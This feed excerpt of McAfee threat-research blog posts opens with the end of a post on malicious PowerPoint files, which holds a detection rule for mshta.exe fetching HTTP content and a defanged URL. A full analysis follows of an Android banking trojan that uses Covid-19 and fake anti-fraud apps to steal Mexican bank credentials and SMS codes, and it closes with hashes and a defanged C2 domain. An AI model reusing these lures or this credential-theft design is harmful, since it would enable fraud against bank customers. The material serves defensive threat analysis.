    Match PROCESS { 

       Include OBJECT_NAME { -v “mshta.exe” } 

       Include PROCESS_CMD_LINE { -v “**http**” } 

       Include -access “CREATE” 







hxxp:// //1230948%[email protected]/p/27.html 





EML files: 





PPAM files: 






Extracted AgentTesla files: 



The post Malicious PowerPoint Documents on the Rise appeared first on McAfee Blog.

✇McAfee Blogs

Android malware distributed in Mexico uses Covid-19 to steal financial credentials

By: McAfee Labs

Authored by Fernando Ruiz

McAfee Mobile Malware Research Team has identified malware targeting Mexico. It poses as a security banking tool or as a bank application designed to report an out-of-service ATM. In both instances, the malware relies on the sense of urgency created by tools designed to prevent fraud to encourage targets to use them. This malware can steal authentication factors crucial to accessing accounts from their victims on the targeted financial institutions in Mexico. 

McAfee Mobile Security is identifying this threat as Android/Banker.BT along with its variants. 

How does this malware spread? 

The malware is distributed by a malicious phishing page that provides actual banking security tips (copied from the original bank site) and recommends downloading the malicious apps as a security tool or as an app to report out-of-service ATM. It’s very likely that a smishing campaign is associated with this threat as part of the distribution method or it’s also possible that victims may be contacted directly by scam phone calls made by the criminals, a common occurrence in Latin America. Fortunately, this threat has not been identified on Google Play yet. 

Here’s how to protect yourself 

During the pandemic, banks adopted new ways to interact with their clients. These rapid changes meant customers were more willing to accept new procedures and to install new apps as part of the ‘new normal’ to interact remotely. Seeing this, cyber-criminals introduced new scams and phishing attacks that looked more credible than those in the past leaving customers more susceptible. 

Fortunately, McAfee Mobile Security is able to detect this new threat as Android/Banker.BT. To protect yourself from this and similar threats: 

  • Employ security software on your mobile devices  
  • Think twice before downloading and installing suspicious apps especially if they request SMS or Notification listener permissions. 
  • Use official app stores however never trust them blindly as malware may be distributed on these stores too so check for permissions, read reviews and seek out developer information if available. 
  • Use token based second authentication factor apps (hardware or software) over SMS message authentication 

Interested in the details? Here’s a deep dive on this malware 

Figure 1- Phishing malware distribution site that provides security tips
Figure 1- Phishing malware distribution site that provides security tips

Behavior: Carefully guiding the victim to provide their credentials 

Once the malicious app is installed and started, the first activity shows a message in Spanish that explains the fake purpose of the app: 

– Fake Tool to report fraudulent movements that creates a sense of urgency: 

Figure 2- Malicious app introduction that try to lure users to provide their bank credentials
Figure 2- Malicious app introduction that tries to lure users to provide their bank credentials\

“The ‘bank name has created a tool to allow you to block any suspicious movement. All operations listed on the app are still pending. If you fail to block the unrecognized movements in less than 24 hours, then they will charge your account automatically. 

At the end of the blocking process, you will receive an SMS message with the details of the blocked operations.” 

– In the case of the Fake ATM failure tool to request a new credit card under the pandemic context, there is a similar text that lures users into a false sense of security: 

Figure 3- Malicious app introduction of ATM reporting variant that uses the Covid-19 pandemic as pretext to lure users into provide their bank credentials
Figure 3- Malicious app introduction of ATM reporting variant that uses the Covid-19 pandemic as a pretext to lure users into providing their bank credentials

“As a Covid-19 sanitary measure, this new option has been created. You will receive an ID via SMS for your report and then you can request your new card at any branch or receive it at your registered home address for free. Alert! We will never request your sensitive data such as NIP or CVV.”This gives credibility to the app since it’s saying it will not ask for some sensitive data; however, it will ask for web banking credentials. 

If the victims tap on “Ingresar” (“access”) then the banking trojan asks for SMS permissions and launch activity to enter the user id or account number and then the password. In the background, the password or ‘clave’ is transmitted to the criminal’s server without verifying if the provided credentials are valid or being redirected to the original bank site as many others banking trojan does. 

Figure 4- snippet of user entered password exfiltration
Figure 4- snippet of user-entered password exfiltration

Finally, a fixed fake list of transactions is displayed so the user can take the action of blocking them as part of the scam however at this point the crooks already have the victim’s login data and access to their device SMS messages so they are capable to steal the second authentication factor. 

Figure 5- Fake list of fraudulent transactions
Figure 5- Fake list of fraudulent transactions

In case of the fake tool app to request a new card, the app shows a message that says at the end “We have created this Covid-19 sanitary measure and we invite you to visit our anti-fraud tips where you will learn how to protect your account”.  

Figure 6- Final view after the malware already obtained bank credentials reinforcing the concept that this application is a tool created under the covid-19 context.
Figure 6- Final view after the malware already obtained bank credentials reinforcing the concept that this application is a tool created under the covid-19 context.

In the background the malware contacts the command-and-control server that is hosted in the same domain used for distribution and it sends the user credentials and all users SMS messages over HTTPS as query parameters (as part of the URL) which can lead to the sensitive data to be stored in web server logs and not only the final attacker destination. Usually, malware of this type has poor handling of the stolen data, therefore, it’s not surprising if this information is leaked or compromised by other criminal groups which makes this type of threat even riskier for the victims. Actually, in figure 8 there is a partial screenshot of an exposed page that contains the structure to display the stolen data. 

Figure 7 - Malicious method related to exfiltration of all SMS Messages from the victim's device.
Figure 7 – Malicious method related to exfiltration of all SMS Messages from the victim’s device.

Table Headers: Date, From, Body Message, User, Password, Id: 

Figure 8 – Exposed page in the C2 that contains a table to display SMS messages captured from the infected devices.
Figure 8 – Exposed page in the C2 that contains a table to display SMS messages captured from the infected devices.

This mobile banker is interesting due it’s a scam developed from scratch that is not linked to well-known and more powerful banking trojan frameworks that are commercialized in the black market between cyber-criminals. This is clearly a local development that may evolve in the future in a more serious threat since the decompiled code shows accessibility services class is present but not implemented which leads to thinking that the malware authors are trying to emulate the malicious behavior of more mature malware families. From the self-evasion perspective, the malware does not offer any technique to avoid analysis, detection, or decompiling that is signal it’s in an early stage of development. 



  • 84df7daec93348f66608d6fe2ce262b7130520846da302240665b3b63b9464f9 
  • b946bc9647ccc3e5cfd88ab41887e58dc40850a6907df6bb81d18ef0cb340997 
  • 3f773e93991c0a4dd3b8af17f653a62f167ebad218ad962b9a4780cb99b1b7e2 
  • 1deedb90ff3756996f14ddf93800cd8c41a927c36ac15fcd186f8952ffd07ee0 


  • https[://]appmx2021.com 

The post Android malware distributed in Mexico uses Covid-19 to steal financial credentials appeared first on McAfee Blog.